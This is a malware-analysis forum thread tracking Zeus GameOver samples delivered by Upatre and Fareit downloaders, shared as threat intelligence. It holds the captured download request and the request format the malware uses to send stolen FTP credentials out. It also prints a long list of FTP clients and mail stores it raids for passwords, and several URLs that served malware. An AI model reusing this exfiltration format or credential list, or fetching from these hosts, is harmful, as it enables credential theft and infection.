A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #20343  by unixfreaxjp
 Fri Aug 02, 2013 10:50 am
This Zeus/gameover was downloading from Fareit I reported HERE.
VT detection ratio is too low (3/46) https://www.virustotal.com/en/file/6335 ... 375438407/

The sample was downloaded from this remote host:
Code: Select all
GET /hc53.exe HTTP/1.1
Accept: */*
Accept-Language: ja
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Host: esmallboxes.com
Connection: Close
  :
HTTP/1.1 200 OK
Content-Length: 199168
Content-Type: application/octet-stream
Last-Modified: Thu, 01 Aug 2013 16:34:50 GMT
Accept-Ranges: bytes
ETag: "7a4646bd58ece1:428ef"
Server: Microsoft-IIS/6.0
X-Powered-By-Plesk: PleskWin
X-Powered-By: ASP.NET
Date: Fri, 02 Aug 2013 08:35:10 GMT
Connection: close
AutoStart path:
Code: Select all
Software\Microsoft\Windows\CurrentVersion\Run
Poking remote host with HTTP/1.1 with below User-Agent & headers
Code: Select all
GET HTTP/1.1
Mozilla/4.0 (Mozilla/4.0; MSIE 7.0; Windows NT 5.1; FDM; SV1; .NET CLR 3.0.04506.30)
X-Real-IP: 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
gzip
5629186B-0207-4659-AE5D-B09282932A86
Using POST Method for posting ftp credentials of infected PC:
Code: Select all
HTTP/1.1
Mozilla/5.0 (Windows; U; Windows NT 5.1)
index_get.php?key=YRHDXCF&action=ADD_FTP&id=%s&ftp_host=%s&ftp_login=%s&ftp_pass=%s
Transfer-Encoding: chunked
Content-Length:
Content-Encoding: gzip
This is the FTP credentials aimed:
Code: Select all
Software\VanDyke\SecureFX
Config Path
\Sessions
DataFolder
Software\FTPRush
RushSite.xml
Software\UltraFXP
Sites.xml
Estsoft\ALFTP\ESTdb2.dat
Software\Microsoft\Windows\CurrentVersion\Uninstall
FTP Commander
FTP Navigator
InstallLocation
UninstallString
%s\TurboFTP\addrbk.dat
%s:%s:%s:%s
%s:%s:%s:%s:%d
%s\SmartFTP\Client 2.0\Favorites
%s\*.xml
<Host>
<Host>
</Host>
<Port>
<Port>
</Port>
<User>
<User>
</User>
<Password>
<Password>
</Password>
%s:%s:%s:%s
%s:%s:%s:%s:%s
ixKZ-<
host
uid
pwd
software\ipswitch\ws_ftp
DataDir
%s\sites\ws_ftp.ini
connections
host
username
password
anonymous
e-mail
general
GHISLER
FtpIniName
Install_Dir
InstallDir
pstorec.dll
crypt32.dll
PStoreCreateInstance
CryptUnprotectData
FileZilla\FileZilla.xml
FileZilla\RecentServers.xml
FileZilla\SiteManager.xml
Server 
Site 
Install_Dir
FileZilla.xml
Last Server Pass
Last Server User
Last Server Host
\QCToolbar
QCHistory
\GlobalSCAPE
HostName
User
Password
software\far\plugins\ftp\hosts
software\far2\plugins\ftp\hosts
Username
Hostname
Password
User
Host
Software\FTPWare\CoreFTP\Sites
hdfzpysvpzimorhk
USER
HOST
PASS
E+ts
UID
URL
Encrypt_PW
User
Server
Password
Ftplist.txt
Password
HostName
Username
Software\CoffeeCup Software\Internet\Profiles
robert249fsd)af8.?sf2eaya;sd$%85034gsn%@#!afsgsjdg;iawe;otigkbarr
q9IN
%AppData%\..\Local\VirtualStore\Program Files\Total Commander
wcx_ftp.ini
Software\Ghisler
WininetCacheCredentials
DPAPI: 
internet explorer
MS IE FTP Passwords
Run in Secure Mode
%AppData%\..\Local\VirtualStore\Program Files\FileZilla
FILEZILLA1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZ
Software\FileZilla
Software\FileZilla\Site Manager
User
Host
Pass
%s:%s:%s:%s
\*.ini
\Software\GlobalSCAPE\
Checked mail softwares..
Code: Select all
Software\Microsoft\WAB\DLLPath
Microsoft Outlook
SOFTWARE\Clients\Mail
SOFTWARE\Clients\Mail\Microsoft Outlook
Open WAB/Outlook Express to get IDs..
Code: Select all
WABOpen
Identities
Microsoft\Outlook Express
*.dbx
MSWQ*.tmp
Attachments
pwd: infected
(105.09 KiB) Downloaded 79 times
 #21093  by R136a1
 Sun Oct 06, 2013 12:50 pm
hxxps://1qazxsw2obiwanhuyontop.com/proga.exe
hxxps://216.194.165.222/bomberman.exe
hxxps://actorsneedwebsites.com/tron/8mo.exe
hxxps://awcoomer.com/house/tp7.exe
hxxps://bytecloud.biz/feeds/rhk.exe
hxxps://cardiffpower.com/day1/dusp.exe
hxxps://ce-cloud.com/images/note.exe
hxxps://ciderbrokers.com/images/10ring.exe
hxxps://cyclivate.com/wp-admin/xtsg.exe
hxxps://dcmsservices.com/egg/rchp.exe
hxxps://gov-l.com/go/da.exe
hxxps://huyontop.com/agorp.exe
hxxps://huyontop.com/proga.exe
hxxps://leisuremaintenanceltd.com/night/3moon.exe
hxxps://paydaypedro.co.uk/p1/d2.exe
hxxps://rockeyracing.com/images/06morning.exe
hxxps://sicherhosting.com/career/rc.exe
hxxps://talonstamed.com/gen/dous8.exe
hxxps://thesafeconsumer.com/safe/8mor.exe
hxxps://thisaintpc.com/downloads/tehb.exe
hxxps://thisisyourwife.co.uk/plugins/system/Update.exe
hxxps://whitewaterexcitement.com/files/nbt.exe
hxxps://www.c3dsolutions.com/set/do6.exe
hxxps://zestimports.com/book/12Mo.exe
http://www.secureworks.com/cyber-threat ... ownloader/
 #21972  by Xylitol
 Fri Jan 17, 2014 10:54 am
Fresh sample found yesterday from a 18kb file
http://malwaredb.malekal.com/index.php? ... eaba2593b5
http://malwaredb.malekal.com/index.php? ... 3a62e64444
Downloading:
Code: Select all
https://gwentpressurewashers.co.uk/images/stories/food/wav.exe (can be downloaded without ssl but the file download it via)
http://thisisyourwife.co.uk/images/banners/heap.exe
https://www.virustotal.com/en/file/f063 ... 389956077/
https://www.virustotal.com/en/file/e33c ... 389956081/
https://www.virustotal.com/en/file/f080 ... 389956086/
https://www.virustotal.com/en/file/b0d9 ... 389956087/
Attachments
infected
(349.06 KiB) Downloaded 79 times
 #22224  by Xylitol
 Sat Feb 15, 2014 2:38 pm
To resume what's happened those weeks:
Last clear sample before the encryption '.enc' appeared: 01-24 - http://vxvault.siri-urz.net/ViriList.ph ... 2A31F722AB
Now, this one: http://malwaredb.malekal.com/index.php? ... 9f558408e6
Detected as Upatre by Malwarebytes the 27 Jan download the following:
Code: Select all
http://at-tuqa.com/images/banners/pdf.enc (still active)
This one of the 24: http://malwaredb.malekal.com/index.php? ... 01051d9416 (again Upatre)
24: http://malwaredb.malekal.com/index.php? ... 5140ec72c6

So if we haven't missed a sample, Zeus gameover gang have started to use encryption the 24 January.
Gary Warner is the first person who talked (publicly) about the new encryption: http://garwarner.blogspot.fr/2014/02/ga ... on-to.html (02 Feb)
Thanks to siri for helping me to retrace the date of first use.

Related articles about the encryption:
CrySyS Blog - GameOver Zeus now uses Encryption to bypass Perimeter Security – .enc encryption
Kahu Security - Exploring XOR Decryption Methods
siri - ZeuS GameOver decoder
---
Upatre:
First submission 2014-01-23: https://www.virustotal.com/en/file/e503 ... 392476566/
First submission 2014-01-24: https://www.virustotal.com/en/file/1317 ... 392476567/
First submission 2014-01-27: https://www.virustotal.com/en/file/97a5 ... 392476567/

Zeus Gameover 'last' clear sample:
First submission 2014-01-23: https://www.virustotal.com/en/file/e3b1 ... 392476682/

Zeus Gameover 'first' encoded sample (downloaded from Upatre: bc20cd3aaad285fa8820c901051d9416):
https://www.virustotal.com/en/file/2fc9 ... 392480407/
Attachments
infected
(273.22 KiB) Downloaded 69 times
infected
(22.96 KiB) Downloaded 63 times
infected
(245.97 KiB) Downloaded 71 times
 #22248  by SomeUnusedName
 Tue Feb 18, 2014 9:21 am
Am I missing something or is all the fuzz basically about some downloader used for Zeus Gameover which now encrypts its payload? How's that anything special? It's not like other downloader bots don't do it.
 #22252  by forty-six
 Tue Feb 18, 2014 2:30 pm
Something missing in Xylitol's post is, upatre is not the only way GMO is being delivered. Just one of the ways.

Caught it via Andromeda too.

Lately getting dropped via Angler EK.
Attachments
(142.63 KiB) Downloaded 75 times
(230.83 KiB) Downloaded 73 times